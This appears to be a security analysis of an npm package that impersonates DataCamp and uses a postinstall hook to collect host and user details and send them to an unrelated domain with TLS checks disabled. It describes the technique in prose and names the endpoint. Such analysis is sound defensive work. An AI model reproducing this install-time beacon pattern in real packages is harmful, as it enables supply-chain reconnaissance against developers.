Package impersonates the DataCamp brand while shipping near-empty stub exports (index.js init/helper return trivial constants). The postinstall lifecycle hook (node install.js) runs on every npm install and collects the installer's hostname, OS username, home directory, platform, current working directory, and timestamp, then POSTs them over HTTPS to dc.iam.c.noratomo.asia/install with TLS certificate verification disabled (rejectUnauthorized: false). The destination domain has no relationship to datacamp.com. The combination of brand-impersonating name, hollow library functionality, lifecycle-triggered outbound beacon to an unrelated domain, identifying-host fields, and disabled TLS verification is a supply-chain reconnaissance implant against developers who install this expecting DataCamp tooling.